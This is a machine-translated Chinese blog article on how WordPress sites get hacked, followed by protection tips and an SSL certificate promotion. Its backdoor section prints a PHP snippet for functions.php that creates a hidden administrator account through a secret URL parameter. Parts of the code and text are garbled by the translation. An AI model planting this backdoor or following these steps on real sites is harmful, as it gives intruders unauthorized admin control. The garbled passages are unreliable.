• WordPress

如何破解WordPress?

  • Felix Rose-Collins
  • 1 min read
如何破解WordPress?

如何破解WordPress](introduction.png)

介绍

在开始这篇文章之前,我们想让你知道,黑客攻击是非法的,我们不鼓励任何恶意的活动。这篇文章只是为了让你了解骗子是如何工作的,以及各种网站安全方法对防止他们的危害是多么重要。我们来讨论一下。

  • 骗子是如何入侵WordPress的?
  • 如何保护你的WP网站不受骗子攻击?

所以,不用再多说了,让我们开始讨论这个话题。

如何在网上黑掉WordPress网站?

如何在线破解WordPress网站 (Source:wpsecurityninja.com)

###使用WPScan。 WPScan是一个WP安全扫描器,可以帮助网站所有者检查他们的WordPress网站是否有漏洞,但这个扫描器也被黑客利用来实现他们黑掉网站的动机。

WPScan允许网站所有者和管理员指定WP用户账户和暴力破解密码,是获得未经授权访问WP账户的首要步骤。

使用WPScan暴力破解用户名和密码 (使用WPScan暴力破解用户名和密码。源于此。Medium)

MIM攻击。

在用户使用类似局域网的情况下,中间人(MIM)攻击可以很容易地进行。非加密的用户登录是一个软目标,因为所有的细节都可以通过纯文本看到。

参与进行这些类型的攻击的软件可以发现被破坏的主题、插件并可以列举用户。

MIM攻击 (来源:《中国新闻周刊》。Medium)

SQL注入。

SQL注入攻击被认为是用于渗透网站的最突出攻击。这些攻击的目标是网站的后台网关,并允许黑客通过实施妥协的命令来渗透它们。

SQL注入 (来源:[secure.wphackedhelp.com]https://secure.wphackedhelp.com/blog/hack-wordpress-website/#How_To_Hack_A_WordPress_Website_8211_Various_Ways))

这些渗透还允许黑客修改数据库和命令,删除或窃取网站信息。

由于这些SQL攻击发现了易受攻击和未打补丁的网站,它们使黑客的任务变得容易和成功。

###利用我的SQL/cPanel。

在这种方法中,黑客创建一个假账户或修改当前WP网站用户的密码。黑客试图通过打开PhpMyAdmin来渗透到cPanel。他们在寻找以_users结尾的表,并找到他们想要修改的用户。

这将允许他们改变他们计划入侵的用户的凭证。他们通过打开在线MD5生成器追踪用户并改变用户的密码(来自user_pass字段),并将其替换为他们想要的密码,然后点击#。

! 利用我的SQL/cPanel (用户名、用户的哈希密码、他们的电子邮件ID等都存储在wp_users数据库表中。源于此。firstsiteguide.com)

用户名、用户的哈希密码、他们的电子邮件ID等都存储在wp_users数据库表中。

###编辑Functions.php。

黑客也会进入cPanel来修改Functions.php文件。通过解锁文件管理器,他们寻找活动主题的文件夹。 从public_html/wp_content/themes文件夹中,他们追踪主题,并通过放置他们破坏的代码来编辑 functions.php。由于黑客已经创建了一个新的账户,所以黑客已经在进行中了。一旦完成,他们就会擦除被破坏的代码。

通过FTP创建一个新的用户账户。

一般来说,FTP账户帮助网站所有者在其网站内生成一个目录,允许特定的用户使用其登录凭证上传/下载他们的文件。

这些文件也可以在互联网上查看。

> 在网站上创建一个FTP账户的步骤:> > - 输入所需的数据 > - 输入新的FTP用户的用户名 > - 输入用于分配账户的密码,以便通过FTP访问 > - 输入用于通过FTP访问的目录名称 > - 写下您希望分配给该文件夹的所需MB空间。 > - 然后按"创建 "按钮创建新帐户。

新用户必须加载以下数据才能通过FTP获得访问权。


地址/主机名/地址:yourdomain.com或ftp.yourdomain.com

用户/用户:[email protected]

密码:分配给这个FTP账户的El密码

端口:21 命名用于上传/下载文件的文件夹。


新用户将对所选目录及其包含的所有子目录拥有读写权限。

例如,如果你创建了客户用户,并给他访问/home / user / public_html的权限

通过后门渗透。

渗透网站的恶意方式是通过后门。无论是想进入你的网站的诈骗者,还是想通过后门进入重新获得网站访问权的受害用户,他们都需要遵循以下步骤。

在某些情况下,当通过FTP创建一个新的用户账户或进行密码重置时,但没有得到理想的结果,用户可能想通过后门进入黑掉他们的网站,找回他们的管理权限。

创建后门的步骤:

  • 打开 functions.php 文件并粘贴下面的代码。

``php add_action('wp_head', 'wploop_backdoor'); 函数 wploop_backdoor() { 如果($_GET['backdoor'] == 'knockknock') { require('wp-includes/registration.php')。 如果(!username_exists('username')){ $user_id = wp_create_user('name', 'pass'); $user = new WP_User($user_id); $user->set_role('administrator'); } } } ?>



- 稍后保存更改。

### 加密货币劫持和加密货币开采。

加密货币的流行催生了新的网络威胁,如[crypto-jacking](https://en.wikipedia.org/wiki/Cryptojacking),它也被称为加密货币采矿恶意软件。

违背用户的意愿以及意识而没收计算机的行为被称为加密劫持。在加密劫持恶意软件中,骗子通过软件传递的恶意软件感染用户的计算机,以破坏系统和网络。

### 网络钓鱼。

网络钓鱼是一种方法,欺诈者通过冒充合法实体欺骗用户的敏感信息(登录凭证、社会账户号码、密码、信用卡详细信息等)。他们通常借助于电子邮件来实现其目的。

> **例子:**骗子可能冒充可靠的来源,从用户那里收集个人资料,以满足他们的愿望。
> 他们还可能在钓鱼邮件中放置一个[坏链接](/blog/complete-guide-to-cleaning-up-your-bad-backlinks/),并将他们引向一些欺诈性网站以传递恶意软件。


### 恶意软件。

 *[WordPress安全统计](https://wpclipboard.com/wordpress-statistics-infographic/)表明,有4000个WP网站由于假的SEO插件而被恶意软件感染。

骗子们不需要一个源头来传递恶意软件。SEO插件、WP主题以及网站中存在的许多其他因素都促使黑客使用最近的WP-VCD恶意软件。

甚至钓鱼邮件也是传递恶意软件的门路。

在这里,黑客的座右铭也是一样的,即通过渗透系统和窃取信息获得用户的敏感数据。

### WordPress勒索软件。

在WP勒索软件中,黑客使用恶意软件来阻止用户访问系统和网络。用户可以通过支付黑客所要求的赎金来恢复这些数据。 
> **例子:** [Petya攻击](https://en.wikipedia.org/wiki/Petya_(恶意软件)),黑客对你的文件和数据进行加密,并对解密密钥要求赎金。

### 跨站脚本(XSS)攻击。
XSS攻击是由黑客通过向网站注入恶意内容,从而利用浏览器来进行的。这种攻击允许黑客从cookies中窃取数据,修改网站内容,并抓住网站获取敏感数据。

###点击劫持。
在点击劫持中,黑客恶意地试图破坏一个按钮/链接,并促使用户点击被破坏的对象。 
这允许黑客执行恶意命令,以获取用户的敏感数据。 

### 欺骗。

欺骗是一种攻击,在这种攻击中,某人将自己伪装成一个值得信赖的身份,以获得用户的非法利益,欺骗他们提交他们的机密信息。 

为了防止所有这些黑客攻击,需要采取具体的安全措施来保护你的WP网站。 

## 如何保护WordPress网站免受黑客攻击? 

![如何保护WordPress网站免受黑客攻击?](spoofing.jpg)
(来源:[envisaged digital.co.uk](https://www.envisagedigital.co.uk/wordpress-market-share/))

以上的统计数据足以说明WordPress的受欢迎程度。正是这种受欢迎程度使得这个CMS平台在黑客中更受欢迎,他们尝试各种黑客方法来获取WP网站和他们的数据。 

因此,了解如何防止黑客访问你的WP网站是非常重要的。 

###用SSL证书保护你的WP网站。

当任何数据被加载到网站上时,它总是以纯文本形式存在,包括黑客在内的所有人都很容易看到。这可能是有风险的,因为黑客可以滥用你的网站数据。

SSL *(安全套接字层)*证书是那些有助于用256位加密安全保护你的WP网站的数字证书,从而将你的网站数据转换为编码格式。

黑客虽然获得了对你网站的访问权,但却无法读取代码,因此他们被迫离开这样的网站。

用SSL证书保护你的WP网站](ssl.jpg)
(来源:《中国新闻周刊》。[clickssl.net](https://www.clickssl.net/cheapest-wildcard-ssl-certificate-for-sub-domains))

选择你想要的SSL证书品牌(Comodo、Thawte、RapidSSL等)并在你的WP网站上安装相同的证书。就SSL证书的类型而言,你需要了解域名和子域名。例如,如果你的WP网站有子域,那么,一个[便宜的通配符证书](https://www.clickssl.net/cheapest-wildcard-ssl-certificate-for-sub-domains)大约只需要*45美元/年,就可以保证你的整个数字业务。 

快速签发、2048位密钥加密、促进搜索引擎优化、网站信任印章、99%的浏览器/移动设备兼容性、退款政策和保修是安装野卡SSL证书的一些特点和好处。

SSL产品的各种品牌和选择、预算友好的价格和优秀的客户服务是接近ClickSSL商店以确保WP网站安全的几个好处。

###更新你的雇员。

人为的错误可能是灾难性的,所以一定要确保让你的员工了解最新的网络威胁,避免他们受到伤害。 

如果你的员工能够在初始阶段追踪到黑客网站的可疑信号,他们可以通知有关方面,防止你的网站和[业务](/blog/5-ways-to-boost-sales-on-your-online-business/)受到进一步的损害。

### 使用双因素认证(2FA)。

在网站登录过程中实施2FA是抵御蛮力攻击的最关键的方法。除了增加另一个安全层,它们还可以防止网站和用户数据。 

这是因为如果一个安全层被破坏,诈骗者需要入侵第二层来获得网站的访问权。 

这是一个艰难的决定,因此在大多数情况下,诈骗者最终会转移到其他安全性差的网站。

> **提示:** [WP 2FA](https://wordpress.org/plugins/wp-2fa/)是一个免费的WP插件,为你的WP网站提供一个额外的安全层。 

### 定期审计管理员用户。

这对你的WP网站的安全非常重要。确保定期审核您的管理用户,并交叉检查他们的访问权限。 

同时确保你的用户以及员工根据他们的任务拥有有限的访问权限,以防止安全漏洞。

### 定期更新WordPress核心。

不了解WP核心?

让我告诉你,WP核心包括所有WP工作所需的基本基础文件。 

从WordPress.org下载的WP压缩文件中的文件列表

![定期更新WordPress Core](image10.png)
(Source:[ithemes.com](https://ithemes.com/blog/wordpress-core/))

这些核心文件需要在安全更新发布后定期更新,以修补所有的安全漏洞。

### 从值得信赖的来源下载WP主题和插件。

这是至关重要的,因为当插件没有更新或从不可信的来源安装时,它们可能会很危险。在使用免费/付费插件的情况下,一定要检查以下所述的因素,如。

- 用户评级和评论 
- 用户友好度 
- 兼容性
- 安全性 
- 可信度 

下载值得信赖的WP主题和插件](image11.png)
(Source:[torquemag.io](https://torquemag.io/2018/04/is-that-plugin-reliable-how-to-test-wordpress-plugins/))

这条规则也适用于安装WP主题。 

###定期更新WP主题和插件。

过时或过期的WP主题和插件总是对你的WP网站构成威胁,因为它们的安全标准已经丧失了。为了防止黑客利用这种途径传播恶意软件来获取网站访问权,请确保定期更新您的WP网站中使用的主题和插件。

这将有助于插件的正常运行,并与最新版本的WP保持同步。 

> **提示:**在插件页面,您可以查看所有已安装的插件,以及每个插件旁边的 "启用自动更新 "链接。把它打开,以便自动更新。

###修改默认的管理员名称。

黑客太聪明了,他们可以通过使用默认的管理名称轻松地渗透到你的WP网站。最好是修改默认的管理用户名,以防止黑客执行暴力攻击以获得对你网站的未经授权的访问。

### 授予有限的访问权。

永远不要给予超过必要的权限,同样的规则也适用于授予用户以及雇员的网站权限。 

访问控制是网站和数据安全的首要规则,因为它定义了谁能或不能访问网站。为了网站的安全,封锁WP管理和其他关键代码和数据的所有入口。

限制访问不仅能提高生产力,而且还能保证你的网站不被恶意进入。

###更新WordPress。

当你的WordPress没有更新时,你的网站就有被黑客入侵的风险。

WordPress占据了37%的市场份额,而且它不断地定期发布更新,以修复安全漏洞和错误。这些更新还包括新的功能和对现有功能的改进,这对提高你的网站性能很有用。 

为什么你应该经常更新你的WordPress](update-wordpress.png)
(来源:《中国新闻周刊》。[wpbeginner.com](https://www.wpbeginner.com/beginners-guide/why-you-should-always-use-the-latest-version-of-wordpress/))

保持你的WP网站更新,以获得强大的安全性。

## 总结。

使用强大而复杂的密码,保持你的WP网站以及插件和主题的更新,以修复所有的安全漏洞。花时间教育你的员工,因为这总是有助于预防灾难。

永远不要在安全问题上松懈,并始终确保使用最好的和值得信赖的安全插件,以保持你的WP网站安全不受窥视。此外,用SSL保护你的网站,以提高客户的信任,业务和[SEO](/blog/what-is-seo/)。  

现在你已经知道了黑客是如何运作的,我们希望这篇文章能帮助你防止黑客渗透到你的网站,并以安全的方式管理你的WP网站。 


export const _frontmatter = {"title":"如何破解WordPress?","description":"在开始这篇文章之前,我们想让你知道,黑客攻击是非法的,我们不鼓励任何恶意的活动。这篇文章完全是为了获得有关骗子如何工作的知识,以及各种网站安全方法对防止他们的影响是多么重要。","date":"2022-04-06","image":"intro.png","authors":"Felix Rose-Collins","category":"WordPress"}

免费试用Ranktracker